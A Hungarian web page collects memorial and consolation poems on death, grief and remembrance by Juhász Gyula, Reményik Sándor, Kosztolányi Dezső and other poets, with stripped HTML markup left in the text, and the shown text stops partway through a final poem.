Versek

strong/strong
p style=”text-align: center;”Versek/p
p style=”text-align: center;”strongJuhász Gyula: Consolatio
/strong
Nem múlnak ők el, kik szívünkben élnek,
Hiába szállnak árnyak, álmok, évek.
Ők itt maradnak bennünk csöndesen még,
Hiszen hazánk nekünk a végtelenség./p
p style=”text-align: center;”Emlékük, mint a lámpafény az estben,
Kitündököl és ragyog egyre szebben
És melegít, mint kandalló a télben,
Derűs szelíden és örök fehéren./p
p style=”text-align: center;”Szemünkben tükrözik tekintetük még
S a boldog órák drága, tiszta üdvét
Fölissza lelkünk, mint virág a napfényt
És élnek ők tovább, szűz gondolatként./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongGreg Schreiner : Ne állj meg sírva/strong/p
p style=”text-align: center;”Ne állj meg sírva nyughelyem előtt,
Ne hidd, hogy alszom, hisz ott sem vagyok.
A halkan fúvó szellőben találsz meg,
És a hóban, mely gyémántként ragyog.
Vagyok a napfény érett búzatáblán
Őszi eső, mely gyengéden alászáll.
Ha kora reggel egyszer arra ébredsz,
Hogy madárraj száll arra szárny suhogva,
Ha szíved csendes éjben engem érez,
Én sugárzom rád, csillagként ragyogva./p
p style=”text-align: center;”Ne állj hát sírva nyughelyem előtt!
Emlékezz rám!/p
p style=”text-align: center;”És a halál nem vesz rajtam erőt!/p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongVárnai Zseni: MAMA/strong/p
p style=”text-align: center;”Halott anyámról álmodtam az éjjel,
mióta meghalt, sokszor visszatér,
meglátogat éjjel, ha mélyen alszom,
bárhol vagyok, Ő mindenütt elér./p
p style=”text-align: center;”Tudom, hogy meghalt, álmomban ha látom,
és mégis úgy jön, mintha élne még,
s azt is tudom, hogy ébredésem percén
elhalványítja őt a messzeség./p
p style=”text-align: center;”Sohasem szól, csak mosolyogva néz rám,
mintha nem volna többé már szava,
s csak bólogat, mikor fölsír belőlem:
– bocsáss meg nékem, bocsáss meg Mama!/p
p style=”text-align: center;”Sokat vétettem ellened, míg éltél,
nehéz adósság nyomja lelkemet,
nem tudtalak oly végtelen szeretni,
mint te szerettél, Mama, engemet./p
p style=”text-align: center;”Egész szívem szülötteimnek adtam,
amint te tetted, ó, szegény Mama,
s hidd el, majd ők ezerszer visszaadják,
amit néked vétettem valaha./p
p style=”text-align: center;”Te értem, én meg Őérettük éltem,
Ők meg majd másért, bocsáss meg nekem,
én is előre megbocsátom nékik,
amit majd Ők vétkeznek ellenem!/p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongVárnai Zseni : Jó lenne hinnem…/strong/p
p style=”text-align: center;”Jó lenne hinnem, hogy a lelked él,
Itt leng köröttem testetlen alakban,
S körülcsókolja síró arcomat,
Ha elgyötrődött kínban, könnyben, jajban
Teéretted./p
p style=”text-align: center;”Jó lenne hinnem, hogy a lelked él
Egy más világon, szép fénylő planétán,
Ott vársz reám csak, zengve, boldogan,
Míg elfáradok e bús földi sétán
A hozzád megyek./p
p style=”text-align: center;”Jó lenne hinnem, hogy a lelked él,
S egy új élet fénylő palástját hordod,
És nézed, nézed az én könnyeim,
Ki elvetettél minden földi gondot,
S felém hajolsz./p
p style=”text-align: center;”Jó lenne hinnem, hogy a lelked él,
Ki csillag voltál itt a földi porban,
És istenlelket csókoltál belém,
Nem múlhatsz el Te hamuvá omoltan,
Az nem lehet./p
p style=”text-align: center;”Ó, hinnem kell, hogy lelked mégis él,
E földi kíntól mentesülten, fénylőn,
Mi vagyunk csak, kiket siratni kell,
Kik itt maradtunk fájdalomban élőn
Tenélküled./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongÁprily Lajos: Útravaló/strong/p
p style=”text-align: center;”A lélek,
mikor búcsúzva bontja szárnyait,
visz magával a földről valamit./p
p style=”text-align: center;”Eszmét, melyet világra ő hozott,
virágot, melyet ő virágoztatott./p
p style=”text-align: center;”Én Istenem, én mit vigyek neked?
Nem vihetek én mást, csak verseket./p
p style=”text-align: center;”Kiválasztok pár utamra valót,
a többinél tisztábban dalolót./p
p style=”text-align: center;”S ahol ösvénnyel vár az égi rét,
zenét hallok majd, felséges zenét./p
p style=”text-align: center;”Barátom, aki már előre ment,
azt a zenét rég hallja odafent./p
p style=”text-align: center;”S ahogy azt a muzsikát hallgatom,
azt a keveset rendre hullatom./p
p style=”text-align: center;”Az a zene csak vallatja velem:
Süket sor… nem merem… ezt sem merem./p
p style=”text-align: center;”S amikor, Uram, hozzád érkezem,
könnyű kezem miatt szégyenkezem./p
p style=”text-align: center;”A választottakból csak egy maradt,
az, melyben elfogtam egy sugarad./p
p style=”text-align: center;”Az, amelyikben elmondtam neked,
hogyan szerettem drága földedet./p
p style=”text-align: center;”S szólok: Csak ennyit hoztam. Ó, Uram,
ne ítéld meg nagyon szigorúan…/p
p style=”text-align: center;”***/p

h5 style=”text-align: center;” data-ft=”{quot;typequot;:1,quot;tnquot;:quot;Kquot;}”strongÁprily Lajos : A kertbe ment/strong/h5
p style=”text-align: center;”Uram, én nem tudom, milyen a kerted,
a virágosod és a pázsitod.
Én nem tudom, virágok ültetését
ágyásaidban hogy igazitod./p
p style=”text-align: center;”Csak azt tudom, hogy kendőjét levetve
júniusi vasárnap hajnalán,
beteg lábával és beteg szivével
bánatosan kertedbe ment anyám./p
p style=”text-align: center;”Uram, tele volt immár félelemmel,
sokszor riasztó árnyék lepte meg,
de szigony-eres, érdes két kezével
még gyomlálgatta volna kertemet./p
p style=”text-align: center;”A kicsi teste csupa nyugtalanság,
s most elgondolni nem tudom, hogy ül.
Virágosodban könyörülj meg rajta,
hogy szegény ne szenvedjen tétlenül./p
p style=”text-align: center;”Mezőiden ne csak virágmagot vess,
virágaid közé vegyíts gyomot,
hogy anyám keze gyomlálhassa kerted:
asphodelosod és liliomod./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongReményik Sándor: Végrendelet/strong/p
p style=”text-align: center;”Fáradtságom adom az esti árnynak,
Színeimet vissza a szivárványnak./p
p style=”text-align: center;”Megnyugvásom a tiszta, csöndes égnek,
Mosolygásom az őszi verőfénynek./p
p style=”text-align: center;”Sok sötét titkom rábízom a szélre,
Semmit se várva és semmit se kérve./p
p style=”text-align: center;”Kik üldöztek át tüskén, vad bozóton:
Kétségeim az örvényekbe szórom./p
p style=”text-align: center;”A holtom után ne keressetek,
Leszek sehol – és mindenütt leszek./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongKossányi József: Dal édesanyámnak/strong/p
p style=”text-align: center;”Felújjong szívemben sok aranyhúr
felhangzik öröm és szeretetdal
s leomlik bennem sok nyirkos fal./p
p style=”text-align: center;”Édesanyám jóságát dalolom
télidőben és tavasz vidámon
ifjú lelkem csendül a nótában
a bánatokat mind behantolom./p
p style=”text-align: center;”Anyám lelke napsütésben szálljon
Régi tavaszok verőfényében
Lelkemnek izzó fényözönében
meleget, virágot, dalt találjon./p
p style=”text-align: center;”Hiszen Ő adott nekem mindent,
ami szép, ami örök, ami drága
nótát, mi az élet virága,
Jóságot,szeretetet, Hitet./p
p style=”text-align: center;”Köszönöm Anyám, ajándékod
lábad elé szóróm a kincsem
dalom, örömem, ifjú hitem
köszönöm, anyám, pazarlásod./p
p style=”text-align: center;”Ma Édesanyám jóságát dalolom
És Lelkét titkos-halkan
megcsókolom./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongIsmeretlen: Nem vagy itt tudjuk jól/strong/p
p style=”text-align: center;”Nem vagy itt tudjuk jól
Mégis érezzük karod ölelését
Nem vagy itt tudjuk jól
Mégis látjuk szemed tiszta fényét.
Vihar tépi kinn a fákat
Eső mossa arcunkat
Mit számít?
Jobban fáj az
Hogy nem halljuk hangodat
Szemünkkel téged keresünk
Fülünk csak hangodra vár
Szívből jövő dallam most a
Szelek szárnyán Hozzád száll
Olyan egyedül vagyunk mi most
Nincs ki vigyázzon reánk
Azért hogy most itt légy velünk
Az életünket adnánk./p
p style=”text-align: center;”***
strongReményik Sándor: A menekülő/strong/p
p style=”text-align: center;”
Ha menni kell, magammal sokat vinnék,
Az egész édes, megszokott világot,
Rámástul sok, sok kedves drága képet
És egy pár szál préselt virágot,
Vinnék sok írást, magamét, meg másét,
Sok holt betűbe zárt eleven lelket,
S hogy mindenütt nyomomba szálljanak:
Megüzenném a hulló leveleknek.
Vinném az erdőt, hol örökké jártam,
Hintám, amelyen legelőször szálltam,
A keszkenőm, mivel rossz másba sírni,
A tollam, mert nem tudok mással írni,
Vinném a házunk, mely hátamra nőtt
Az utca kövét küszöbünk előtt!
Vinném… én Istenem, mi mindent vinnék!
Én Istenem, mi minden futna át
Gyötrődő lelkem alagútjain –
Olvasgatnám az ablakok sorát,
Simogatnám a fecskefészkeket,
S magamba színék minden verkliszót,
Mint bűbájos, mennyei éneket…
Utánam honvággyal tekintenének
Az ajtók mind, és mind a pitvarok,
Szeretnék mindent, mindent magammal vinni –
És mindent itt hagyok./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongJuhász Gyula: Búcsú/strong/p
p style=”text-align: center;”
Mielőtt innen végkép elmegyek,
Szeretnék elköszönni, emberek./p
p style=”text-align: center;”Mint rab, akinek int a szabad út,
Búcsút rebeg, mielőtt szabadult./p
p style=”text-align: center;”Mint a madár, kit Dél vár arra túl,
Az eresz alján még egy dalt tanul./p
p style=”text-align: center;”Mit is daloljak, én szegény beteg,
Mit is dadogjak nektek, emberek?/p
p style=”text-align: center;”Talán nem is kell még búcsúzni se?
Hisz észre sem vett engem senkise./p
p style=”text-align: center;”Csak egy könny voltam, aki porba hull,
Csak egy sóhaj, ki égbe szabadul./p
p style=”text-align: center;”Csak egy csók, aki hideg kőre lel,
Csak egy szó, kire visszhang nem felel./p
p style=”text-align: center;”Egy pillangó, ki csillagot keres
S elgázolja egy durva szekeres./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongNagy László: A völgyet nézni…/strong/p
p style=”text-align: center;”A völgyet nézni állj meg a hegytetőn/p
p style=”text-align: center;”Az életet tanuld a temetőn/p
p style=”text-align: center;”Figyelj rám, ki nem mozdítok ajkat/p
p style=”text-align: center;”Már jól beszél, ki mindörökre hallgat/p
p style=”text-align: center;”Most hallgatok, de egykor zengve zengtem/p
p style=”text-align: center;”A föld, a víz, a lég-hallottak engem/p
p style=”text-align: center;”Nem néma-már ha nem szól-a harang/p
p style=”text-align: center;”S nem törli el a csend, hogy volt a hang./p
p style=”text-align: center;”Ha van füled, halld hangtalan beszédem/p
p style=”text-align: center;”Mindegy mi voltam, voltam az, ami./p
p style=”text-align: center;”Egy hang voltam a világ énekében/p
p style=”text-align: center;”És kár lett volna el nem hangzani./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongJuhász Istvánné: Búcsúzom kedvesem/strong/p
p style=”text-align: center;”A szemedbe néztem és megállt a pillanat,
csendesen mellettünk oly sok év elhaladt.
A napok, az órák, évekké váltak,
azt hittem soha, soha meg nem állnak./p
p style=”text-align: center;”Te úgy intézted e világot,
csak nekem nyíltak a virágok.
Nekem dalolt a madár a fán,
a nap is boldogan sütött le rám./p
p style=”text-align: center;”Utolsó  napunkon, szép szemedben,
még ott volt az a huncut szikra.
Tíz körömmel húzott volna,
az élők sorába vissza./p
p style=”text-align: center;”De elfáradt tested, a betegség
már nem engedte szabadon.
Azt ígérted velem maradsz,
S már nem foghatlak szavadon./p
p style=”text-align: center;”A fájdalom egyre nőtt,
mikor a szívem megszakadt,
abban a percben ott legbelül,
én megtaláltalak./p
p style=”text-align: center;”Az a huncut szikra a szemedből,
a szívembe költözött.
S a gyász helyett a szívem,
díszbe öltözött./p
p style=”text-align: center;”Hisz itt van bent a szívemben,
minden boldogságunk titka.
S őrzöm ezt a kincset,
mert nagyon, nagyon ritka./p
p style=”text-align: center;”Hát elengedlek téged,
én szép kedvesem.
Ha könny folyik is az arcomon,
én mosolyogva könnyezem./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongHarkai Kitti: Apuról/strong/p
p style=”text-align: center;”Ő már nincs velem.
Nem fogja két kezem.
Nem mondja azt hogy szeretlek.
Az fáj a legjobban hogy már nincs velem.
Nem szid és nem is dicsér.
Nem intéz hozzám szavakat, de lelkemben mindig is él.
Habár nem lehet velem, de tudom valahol engem néz.
És talán büszke lehet rám, az édesapám./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongPilinszky János: Te győzz le/strong/p
p style=”text-align: center;”Te győzz le engem, éjszaka!
Sötéten úszó és laza
hullámaidba lépek.
Tünődve benned görgetik
fakó szivüknek terheit
a hallgatag szegények/p
p style=”text-align: center;”A foszladó világ felett
te változó és mégis egy,
szelíd, örök vigasz vagy;
elomlik minden kívüled,
mit lágy erőszakod kivet,
elomlik és kihamvad./p
p style=”text-align: center;”De élsz te, s égve hirdetik
hatalmad csillagképeid,
ez ősi, néma ábrák:
akár az első angyalok,
belőled jöttem és vagyok,
ragadj magadba, járj át!/p
p style=”text-align: center;”Feledd a hűtlenségemet,
legyőzhetetlen kényszerek
vezetnek vissza hozzád;
folyam légy, s rajta én a hab,
fogadd be tékozló fiad,
komor, sötét mennyország./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongIsmeretlen:/strong/p
p style=”text-align: center;”Ha sétálhatnék Veled, Apa/p
p style=”text-align: center;”Ha egy ajándék percünk lenne/p
p style=”text-align: center;”Érezhetném lépteid ritmusát/p
p style=”text-align: center;”S a lelkem megnyugodna benne./p
p style=”text-align: center;”Oly apró örömeid voltak/p
p style=”text-align: center;”Nekem jelentéktelennek tűntek/p
p style=”text-align: center;”Mégis, ma mindennapjaimban/p
p style=”text-align: center;”Gondjaim ezekkel szűnnek./p
p style=”text-align: center;”Oly keveset beszéltünk/p
p style=”text-align: center;”Szívünkről semmit talán/p
p style=”text-align: center;”Ha sétálhatnék Veled, Apa/p
p style=”text-align: center;”Őszintén elmondanám/p
p style=”text-align: center;”Hogy sosem értettem haragodat/p
p style=”text-align: center;”Kínodat, fájdalmadat/p
p style=”text-align: center;”De hiába voltál érthetetlen/p
p style=”text-align: center;”Csak erősíted tudatomat./p
p style=”text-align: center;”Mert Te ébresztettél önmagamra/p
p style=”text-align: center;”Megtanítottál, keressem/p
p style=”text-align: center;”Értelmét az életnek/p
p style=”text-align: center;”Az időnek, a szeretetnek/p
p style=”text-align: center;”Szavak nélkül tanítottál/p
p style=”text-align: center;”Lelkedből adtál jeleket/p
p style=”text-align: center;”Melyek segítetek majd a hosszú úton,/p
p style=”text-align: center;”Bár, nem értettem szerepüket./p
p style=”text-align: center;”Ezért hát hadd mondjam el most Neked/p
p style=”text-align: center;”Apu, nagyon szeretlek./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongMecsek Zsuzsa: Neked Apu/strong/p
p style=”text-align: center;”Én a magas égre néztem, önzőn,
s nem láttam, hogy itt a földön
kihunyni készül egy gyertya-láng.
Apám elment, s ott a sírnál,
ahonnan még egyszer visszanézett,
sírtam, s nem gondoltam semmi szépet./p
p style=”text-align: center;”Most az idő már új lapot nyitott,
s a szavak miket számba adott,
megértek talán, hogy formát öltsenek.
Apu, most elmondom Neked,
amit úgyis tudtál, bízom benne,
bár nem volt szavakba öntve,
hogy erős karó voltál nékem
sorsom orkános szelében./p
p style=”text-align: center;”Hajóm alatt Te voltál a hullám,
s árbocomon a vitorla,
mi sérült életemet gyengéden
biztonságos partra sodorta.
Fészek voltál, ahová visszaszállhatott
lelkem, ez az örök vándorló madár,
s röptettél, mikor hívott a látóhatár./p
p style=”text-align: center;”Nem kérdeztem meg soha Tőled,
hogy beváltottam-e reményeidet,
mikor  kóborlásaimra indulva
arcomra csókoltál útlevelet./p
p style=”text-align: center;”Nem mondtam el soha, mit álmodtam,
pedig álmaimat is Tőled kaptam,
most már tudom, mert úgy váltak valóra
mintha abban is a Te kezed volna./p
p style=”text-align: center;”Most felnézek, és kinyitom az eget
még egy percre, hogy elmondjam Neked,
hogy megnyugtassalak, nem vagyok árva,
mert itt vagy velem, a lelkembe zárva,
s most én őrizlek, védelek,
míg felettem is elszállnak a hűtlen évek.
S mielőtt bezárulna az ég,
még két szót felkiáltanék,
mit ritkán mondtam, azután elengedlek:/p
p style=”text-align: center;”Apu, szeretlek./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongEMIL ISAC: HA MEGHALOK/strong/p
p style=”text-align: center;”Ne bánd fiam, ha meghalok,
Értem sírnod sem kell
Hisz én vagyok te, s te vagy én
Nem hagylak soha el./p
p style=”text-align: center;”Világra hangom szólított,
Léted, létembe fog.
Könnyem keresztelt, s búm nyomát
Hordozza homlokod./p
p style=”text-align: center;”Ne emlékezz rám búsan
Hű társam, hitvesem
Már megadatott nékem
Emlékben fénylenem,/p
p style=”text-align: center;”Ne emlékezz rám búsan
Testvér, rokon, barát…
Add meg a könnyet,
Élj és szeress tovább./p
p style=”text-align: center;”Addig vagyok, míg élek
Szívetekben, bennetek.
Ember voltam mindig:
Ezért szeressetek!/p

h3 style=”text-align: center;”/h3
h3 style=”text-align: center;”***/h3
p style=”text-align: center;”strongRemenyik Sándor: Mondom néktek/strong/p
p style=”text-align: center;”Mondom néktek: mi mindig búcsúzunk.
Az éjtől reggel, a nappaltól este,
A színektől, ha szürke por belepte,
A csöndtől, mikor hang zavarta fel,
A hangtól, mikor csendbe halkul el,
Minden szótól, amit kimond a szánk,
Minden mosolytól, mely sugárzott ránk,
Minden sebtől, mely fájt és égetett,
Minden képtől, mely belénk mélyedett,
Az álmainktól, mik nem teljesültek,
A lángjainktól, mik lassan kihűltek,
A tűnő tájtól, amit vonatról láttunk,
A kemény rögtől, min megállt a lábunk./p
p style=”text-align: center;”Mert nincs napkelte kettő, ugyanaz,
Mert minden csönd más, – minden könny, – vigasz,
Elfut a perc, az örök Idő várja,
Lelkünk, mint fehér kendő leng utána,
Sokszor könnyünk se hull, szívünk se fáj,
Hidegen hagy az elhagyott táj, –
Hogy eltemettük: róla nem tudunk.
És mégis mondom néktek:
Valamitől – mi mindig búcsúzunk./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongRemenyik Sándor: Viszontlátásra/strong/p
p style=”text-align: center;”Viszontlátásra, – mondom, és megyek.
Robognak vonatok és életek –
Bennem, legbelül valami remeg.
Mert nem tudom,
Sohasem tudhatom:
Szoríthatom-e még
Azt a kezet, amit elengedek./p
p style=”text-align: center;”Viszontlátásra: mondom mégis, mégis.
Viszontlátásra – holnap.
Vagy ha nem holnap, – hát holnapután.
Vagy ha nem akkor – hát majd azután.
És ha aztán sem – talán egy év múlva.
S ha még akkor sem – hát ezer év múlva.
Viszontlátásra a földnek porában,
Viszontlátásra az égi sugárban.
Viszontlátásra a hold udvarán,
Vagy a Tejút valamely csillagán –
“Vidám viszontlátásra” mégis, mégis!/p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongSzádeczky-Kardoss György: Nincs időd/strong/p
p style=”text-align: center;”Szoktál e néha meg-megállni/p
p style=”text-align: center;”És néhány percre megcsodálni/p
p style=”text-align: center;”A zöld mezőt, a sok virágot,/p
p style=”text-align: center;”Az ezerszínű szép világot,/p
p style=”text-align: center;”A dús erdőt, a zúgó fákat,/p
p style=”text-align: center;”A csillagfényes éjszakákat,/p
p style=”text-align: center;”A völgy ölét, a hegytetőt?/p
p style=”text-align: center;”Nem, neked erre nincs időd./p
p style=”text-align: center;”Szoktál e néha simogatni,/p
p style=”text-align: center;”Sajgó sebekre enyhet adni,/p
p style=”text-align: center;”A hulló könnyeket letörülni,/p
p style=”text-align: center;”Más boldogságán is örülni,/p
p style=”text-align: center;”Meghallgatni kinek ajka/p
p style=”text-align: center;”Bánatra nyílik és panaszra,/p
p style=”text-align: center;”Vigasztalni a szenvedőt./p
p style=”text-align: center;”S ha est borul a késő mára,/p
p style=”text-align: center;”Készülni kell a számadásra,/p
p style=”text-align: center;”Mérlegre tenni egész élted,/p
p style=”text-align: center;”Tettél-e jót, láttál-e szépet,/p
p style=”text-align: center;”És nincs más vágyad, csupán ennyi:/p
p style=”text-align: center;”Nem rohanni, csak ember lenni./p
p style=”text-align: center;”de már látod a temetőt…./p
p style=”text-align: center;”sajnos már nincs több időd…./p
p style=”text-align: center;”***/p
p style=”text-align: center;”strongTúróczy Zoltán: Tanács/strong/p
p style=”text-align: center;”Ma még tiéd körülötted minden.
Adhatsz belőle. Adj hát, kinek nincs,
Mert jön egy nap, talán nemsokára,
S kihull kezedből minden földi kincs./p
p style=”text-align: center;”És nem lesz többé tiéd semmi sem.
Tollad, virágos párnád másra vár …
Mit maga köré épített egy élet,
Nem több, mint összeomló kártyavár./p
p style=”text-align: center;”Ma szólhatsz még jóságos, meleg szóval
Testvéredhez , ki szenved, szomorú.
Vigaszt hoz szavad zengő muzsikája,
S tán rózsát hajt egy töviskoszorú./p
p style=”text-align: center;”Haj olj hát hozzá, amíg beszélhetsz,
Harmat ként hulljon szerető szavad:
Mert jön egy nap, hogy elnémul ajkad,
És soha többé nem fakad./p
p style=”text-align: center;”Ma kezed még erős, a lábad fürge,
Szolgálhatsz szegényt, árvát, beteget.
Ma letörölhetsz verejtéket, könnyet.
Oh, most segíts, ha teheted./p
p style=”text-align: center;”Mert jön egy nap, hogy kezed mozdulatlan,
Mindegy, hogy ősz lesz, tél, vagy kora nyár,
Mert nincs több időd, s amit meg nem tettél,
Azt nem teszed meg soha többé már./p
p style=”text-align: center;”De ma még tiéd körülötted minden.
És adhatsz, adj hát annak, kinek nincs.
Hisz jön egy nap, talán nemsokára,
S kihull kezedből minden földi kincs./p
p style=”text-align: center;”Csak az lesz tiéd, amit odaadtál,
Csak az, mi minden kincsnél többet ér.
A tett, a szó, mit szeretetből adtál,
Véled marad, s örökre elkísér./p
p style=”text-align: center;”***/p

pre/pre
p style=”text-align: center;”strongKosztolányi Dezső: Halotti beszéd/strong/p
p style=”text-align: center;”Látjátok feleim, egyszerre meghalt
és itt hagyott minket magunkra. Megcsalt.
Ismertük őt. Nem volt nagy és kiváló,
csak szív, a mi szívünkhöz közel álló.
De nincs már.
Akár a föld.
Jaj, összedőlt
a kincstár./p
p style=”text-align: center;”Okuljatok mindannyian e példán.
Ilyen az ember. Egyedüli példány.
Nem élt belőle több és most sem él,
s mint fán se nő egyforma két levél,
a nagy időn se lesz hozzá hasonló./p
p style=”text-align: center;”Nézzétek e főt, ez összeomló,
kedves szemet. Nézzétek, itt e kéz,
mely a kimondhatatlan ködbe vész
kővé meredve,
mint egy ereklye,
s rá ékírással van karcolva ritka,
egyetlen életének ősi titka./p
p style=”text-align: center;”Akárki is volt ő, de fény, de hő volt.
Mindenki tudta és hirdette: ő volt.
Ahogy szerette ezt vagy azt az ételt,
s szólt, ajka melyet mostan lepecsételt
a csönd, s ahogy zengett fülünkbe hangja,
mint vízbe süllyedt templomok harangja
a mélybe lenn, s ahogy azt mondta nemrég:
„Édes fiacskám, egy kis sajtot ennék”,
(vagy bort ivott és boldogan meredt a
kezében égő, olcsó cigaretta
füstjére, )és futott, telefonált,
és szőtte álmát, mint színes fonált:
a homlokán feltündökölt a jegy,
hogy milliók közt az egyetlenegy./p
p style=”text-align: center;”Keresheted őt, nem leled, hiába,
se itt, se Fokföldön, se Ázsiába,
a múltba sem és a gazdag jövőben
akárki megszülethet már, csak ő nem.
Többé soha
nem gyúl ki halvány-furcsa mosolya.
Szegény a forgandó tündér szerencse,
hogy e csodát újólag megteremtse./p
p style=”text-align: center;”Édes barátaim, olyan ez éppen,
mint az az ember ottan a mesében.
Az élet egyszer csak őrája gondolt,
mi meg mesélni kezdtünk róla: „Hol volt…”,
majd rázuhant a mázsás, szörnyű mennybolt,
s mi ezt meséljük róla sírva: „Nem volt…”
Úgy fekszik ő, ki küzdve tört a jobbra,
mint önmagának dermedt-néma szobra.
Nem kelti föl se könny, se szó, se vegyszer.
Hol volt, hol nem volt a világon – egyszer./p
p style=”text-align: center;”***/p
p style=”text-align: center;”/p
p style=”text-align: center;”/p
p style=”text-align: center;”strongTeller Ede: Így/strong/p
p style=”text-align: center;”Keresni, várni, semmit sem akarni/p
p style=”text-align: center;”Szeretni, vágyni, egyedül maradni/p
p style=”text-align: center;”Nézni a világot becsukott szemekkel/p
p style=”text-align: center;”Látni azt, amit nem látott még ember/p
p style=”text-align: center;”Gyönyörködni titkos, mély harmóniákban/p
p style=”text-align: center;”Emlékezni arra, mit sohasem láttam,/p
p style=”text-align: center;”Szeretni, imádni a szent tisztaságot/p
p style=”text-align: center;”A szelet, a havat, a szellőt, az álmot…/p
p style=”text-align: center;”Tenni a helyeset, nem kis örömpénzért,/p
p style=”text-align: center;”Nem a túlvilági örökbölcsességért,/p
p style=”text-align: center;”Tudni hogy nincsen cél, tudni, hogy nincs Isten,/p
p style=”text-align: center;”Félni, hogy talán még igazság sincsen./p
p style=”text-align: center;”Tudni hogy az ész rövid, az akarat gyenge/p
p style=”text-align: center;”Hogy rá vagyunk bízva a vak véletlenre/p
p style=”text-align: center;”És makacs reménnyel mégis-mégis HINNI!/p
p style=”text-align: center;”Hogy amit csinálok, az nem lehet semmi!/p
p style=”text-align: center;”És örülni tudni a Nagy Megnyugvásnak/p
p style=”text-align: center;”A fájdalmat, örömöt gyógyító halálnak./p
p style=”text-align: center;”***/p
p style=”text-align: center;”Ismeretlen:ÜZENET/p
p style=”text-align: center;”Miért sirattok?
Hisz Isten arca volt,
mely símogatón,
hívón rám hajolt./p
p style=”text-align: center;”És én mentem…
S most fényözönben élek
És nem vagyok más
Csupán tisztult lélek./p
p style=”text-align: center;”Sziromhullás volt…
Árnyékom lehullt…
A szemetek hát könnybe
miért borult?/p
p style=”text-align: center;”Ha emlegettek: köztetek leszek.
Ha imádkoztok: veletek vagyok.
Ha rám gondoltok, mosolyogjatok.
Emlékem így áldás lesz rajtatok./p
p style=”text-align: center;”***/p
p style=”text-align: center;”Kamarás Klára: Őrizz meg/p
p style=”text-align: center;”Borongós árnyékkal szívemben
járom a kertet őszi csendben.
Búcsút veszek lombtól, virágtól,
maroknyi léttől, csalfa nyártól./p
p style=”text-align: center;”***/p
p style=”text-align: center;”N.Horváth Péter:Tűnődés -részlet-/p
p style=”text-align: center;”Nem hozhatlak vissza a túlsó oldalról,
mégis hiszem, újra találkozol velem,
s ez minden magányos órámért kárpótol,
míg magad ölelve, készíted a helyem./p
p style=”text-align: center;”***/p
p style=”text-align: center;” Heltai Jenő: Búcsú az élettől/p
p style=”text-align: center;”Én istenem, ha menni kell,
Add, én is így mehessek el,
Éjjel, sötétben, észrevétlen,
Büszkén, magamban, ahogy éltem.
Mikor az élet menekül,
Haljak meg én is egyedül,
Egy vén díványra ráborulva,
És senkire se rászorulva,…./p
p style=”text-align: center;”Mint az apám./p
p style=”text-align: center;”***/p
p style=”text-align: center;”Ültünk egymás mellett, s te rám néztél
Meséltél egyre csak s meséltél…
Akkor én megkérdeztem mire vágytam
Nagyapa azt mondta:˝csak kitaláltam!˝./p
p style=”text-align: center;”Nagyapa a meséid olyan szépek
Mesélj nekem sokáig még, arra kérlek!
És mondd, nagyapa, igazak a történetek?
Kislányom, csak kitaláltam mindegyiket!/p
p style=”text-align: center;”Kitaláltad? De miért? Miért nem mesélsz nekem
Igazat vagy valóságot?
Nagyapa mondta: mert a valóság kegyetlen./p
p style=”text-align: center;”Csak kitaláltam a meséket
Hogy neked olyan jó legyen
Ha arcodat nevetni látom
Az jó nekem./p
p style=”text-align: center;”Kitaláltam és meséltem
Szép perceket így szereztem
Ne haragudj kicsi lányom
De az élet már nem álom!/p
p style=”text-align: center;”Nem haragszom, Papi, dehogy
Csak csodálkozom rajta
De már értem miért volt szép
A Csipkerózsika./p
p style=”text-align: center;”Az életemben a meséid fognak erőt adni
Hogy tudnék hát jó nagyapó, én rád haragudni?
Majd teljesíteni próbálok, hogy szégyent ne vallj velem
Papi mondja dühösen, hogy Jajj, drága gyermekem!/p
p style=”text-align: center;”Az életemet és sorsomat nem látom előre én
S csak remélem nem leszek majd egyedül a Földtekén
S csak remélem igaz lesz, mit egyszer mondott az anyám
HOGY BÜSZKE LESZEL EGYSZER ÉNRÁM, DRÁGA NAGYAPÁM!/p
p style=”text-align: center;”***/p
p style=”text-align: center;”Nagyanyámmal ültünk a verandán ketten
az életéről beszélt , és én hallgattam csendben .
Olyan jó volt látni szeme csillogását
minden benne rejlett bánat , és boldogság .
Két kis ráncos kezét az ölébe fektette
bizony az élet őt , soha nem kímélte .
Annak ellenére a sorsot nem okolta a
Jó Isten a gondját mindig megoldotta .
Amikor a munka őt kifárasztotta , még
akkor is, megbékélt lélekkel gondolt a holnapra .
– Kislányom mondta , soha nem felejtem , a
szavai most is itt csengnek fülemben .
A jóság , és szeretet munkálkodjék benned
még ha néha bizony komisz is az élet .
Haragot ne táplálj senkivel sem szemben
ha kővel megdobnak , dobj vissza kenyérrel .
Drága kicsi lelkét visszasírom sokszor
törékeny kis testét megölelném százszor .
Az a sok – sok kérdés , ami itt maradt még
bennem , választ kérnék tőle , s megnyugodna lelkem .
Magamra maradtam , egy üres székkel a verandán
minden szép elmúlik , az élet gyorsan elszáll .
Tűnődöm magamban miközben a kósza felhőket nézem
drága jó nagyanyám , örökké míg élek szívemben élsz nékem
Péter Széll/p
p style=”text-align: center;”***/p
p style=”text-align: center;”Kosztolányi Dezső: Én nagyon sokakat szerettem/p
p style=”text-align: center;”Én nagyon sokakat szerettem,
én vágytam arra, vágytam erre,
de aki úgy szeretett engem,
anyám az életet szerette./p
p style=”text-align: center;”Ő úgy szerette, hogy megállott,
az úton elmaradt, lekésett,
ő úgy hajolt, hogy összeroskadt,
s a porban azt mondotta: élet./p
p style=”text-align: center;”Az életet bámulta folyton,
mint egy menyasszony, mindig-ifjan,
apám szemében kezdte nézni,
és nézte aztán arcainkban./p
p style=”text-align: center;”Csak a szivét hallgatta halkan
mély-kék szemekkel, megbüvölten,
csak a tűnő időt figyelte,
